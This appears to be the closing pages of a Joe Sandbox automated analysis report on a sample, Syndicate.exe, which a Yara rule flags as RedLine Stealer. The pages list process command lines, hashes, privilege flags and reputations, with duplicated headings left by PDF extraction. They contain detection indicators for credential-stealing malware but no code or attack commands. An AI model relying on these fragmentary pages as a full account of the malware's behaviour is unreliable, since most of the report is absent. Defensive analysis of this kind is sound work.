Commandline: 'C:\Users\user\Desktop\Syndicate.exe'
Imagebase: 0xca0000
File size: 2300520 bytes
MD5 hash: 1CA3D04A1C28F573E0A31C49881C8C4A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches: Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.200580397.0000000001C70000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low
Show Windows behavior
Analysis Process: Syndicate.exe PID: 4900 Parent PID: 5696Analysis Process: Syndicate.exe PID: 4900 Parent PID: 5696
General
File CreatedFile Created
File DeletedFile Deleted
File WrittenFile Written
File ReadFile ReadCopyright Joe Security LLC 2021 Page 25 of 27
Registry ActivitiesRegistry Activities Show Windows behavior
Start time: 11:45:58
Start date: 25/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Registry ActivitiesRegistry Activities
Start time: 11:45:59
Start date: 25/07/2021
Path: C:\Windows\System32\GameBarPresenceWriter.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\GameBarPresenceWriter.exe' -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
Imagebase: 0x7ff6cadc0000
File size: 297984 bytes
MD5 hash: 04FC9C82E4D082B728D3337D75043690
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Show Windows behavior
Start time: 11:46:00
Start date: 25/07/2021
Path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_1.15.1001.0_x64__8wekyb3d8bbwe\GameBar.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_1.15.1001.0_x64__8wekyb3d8bbwe\GameBar.exe' -ServerName:App.AppXbdkk0yrkwpcgeaem8zk81k8py1eaahny.mca
Imagebase: 0x7ff7b7fd0000
File size: 3911680 bytes
MD5 hash: 754FD02CE495D5A4C90D6539727319EA
Analysis Process: conhost.exe PID: 4196 Parent PID: 4900Analysis Process: conhost.exe PID: 4196 Parent PID: 4900
General
Analysis Process: GameBarPresenceWriter.exe PID: 5920 Parent PID: 792Analysis Process: GameBarPresenceWriter.exe PID: 5920 Parent PID: 792
General
Key CreatedKey Created
Analysis Process: GameBar.exe PID: 5572 Parent PID: 792Analysis Process: GameBar.exe PID: 5572 Parent PID: 792
General
Copyright Joe Security LLC 2021 Page 26 of 27
Joe Sandbox Cloud Basic 33.0.0 White Diamond
Disassembly
Code Analysis
Copyright Joe Security LLC
Registry ActivitiesRegistry Activities
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Show Windows behavior
Copyright Joe Security LLC 2021 Page 27 of 27